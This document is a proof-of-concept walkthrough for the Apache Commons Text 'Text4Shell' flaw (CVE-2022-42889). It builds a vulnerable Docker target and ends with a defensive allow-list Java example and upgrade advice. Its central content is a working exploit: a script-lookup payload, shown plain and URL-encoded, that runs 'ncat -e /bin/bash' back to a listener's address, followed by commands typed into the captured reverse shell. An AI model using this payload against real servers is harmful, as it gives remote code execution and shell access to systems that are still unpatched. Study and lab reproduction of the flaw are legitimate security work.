Proof of Concept for the Apache commons-text vulnerability CVE-2022-42889.
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are:
- "script" - execute expressions using the JVM script execution engine (javax.script)
- "dns" - resolve DNS records
- "url" - load values from URLs, including from remote servers
Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used.
Affected versions: Apache Commons Text 1.5 to 1.9
Build the image and start the vulnerable container:
docker build --tag=test/text4shell .
docker run -it -p 80:8080 --name text4shell test/text4shell
In another terminal (Terminal Tab 3), open a shell inside the container:
docker exec -it text4shell /bin/bash
In a separate terminal, start a listener for the reverse shell:
nc -nlvp 8888
Check that the endpoint responds to any search value:
curl http://localhost/text4shell/attack?search=<anything>
The attack is performed by passing a string of the form "${prefix:name}" where the prefix is one of the lookups listed above, for example:
${script:javascript:java.lang.Runtime.getRuntime().exec('ncat -e /bin/bash 172.17.0.1 8888')}
The same payload, URL-encoded and sent to the endpoint:
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27ncat%20-e%20%2Fbin%2Fbash%20172.17.0.1%208888%27%29%7D
In the container shell opened with docker exec (Terminal Tab 3), note the contents of /root before the attack:
pwd
cd /root
pwd
ls
In the reverse shell caught by nc, create a marker file:
pwd
cd /root
pwd
ls
touch hacked.txt
ls
Back in Terminal Tab 3, list /root again:
pwd
ls
If hacked.txt is visible in Terminal Tab 3 after running ls, the attack succeeded.
Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
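As an added illustration of the root cause and the fix (example code, not part of this PoC or of Commons Text itself), the class below contrasts StringSubstitutor.createInterpolator(), which on 1.5 to 1.9 wires in the "script", "dns" and "url" lookups, with a substitutor built from an explicit allow-list that leaves any other prefix unexpanded on every version. The class name, the helper names and the sample input are assumptions made for this example.

```java
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

/** Default interpolator (vulnerable on 1.5-1.9) versus an allow-listed one. */
public class Text4ShellMitigation {

    /** Constructed sample input: a user-supplied template carrying a script lookup. */
    static final String UNTRUSTED_INPUT =
            "version=${sys:java.version} payload=${script:javascript:1+1}";

    /**
     * Vulnerable pattern: createInterpolator() registers every default lookup,
     * so on 1.5-1.9 "script", "dns" and "url" are reachable from untrusted text.
     */
    static String expandWithDefaults(String input) {
        return StringSubstitutor.createInterpolator().replace(input);
    }

    /**
     * Hardened pattern: name the lookups the application actually needs and pass
     * addDefaultLookups=false with no fallback lookup. A prefix that is not in the
     * map resolves to null, so StringSubstitutor leaves "${script:...}" verbatim
     * instead of evaluating it, on any library version.
     */
    static StringSubstitutor allowListedSubstitutor() {
        StringLookupFactory factory = StringLookupFactory.INSTANCE;
        Map<String, StringLookup> allowed = new HashMap<>();
        allowed.put("sys", factory.systemPropertyStringLookup());
        allowed.put("env", factory.environmentVariableStringLookup());
        StringLookup interpolator = factory.interpolatorStringLookup(allowed, null, false);
        return new StringSubstitutor(interpolator);
    }

    static String expandSafely(String input) {
        return allowListedSubstitutor().replace(input);
    }

    public static void main(String[] args) {
        // On 1.5-1.9 (with a javax.script JavaScript engine present) the script lookup runs here.
        System.out.println("defaults : " + expandWithDefaults(UNTRUSTED_INPUT));
        // ${sys:java.version} expands; ${script:javascript:1+1} is left untouched.
        System.out.println("allowlist: " + expandSafely(UNTRUSTED_INPUT));
    }
}
```

The allow-list also matters after upgrading: 1.10.0 only removes "script", "dns" and "url" from the defaults, so an application that registers them explicitly is exposed again.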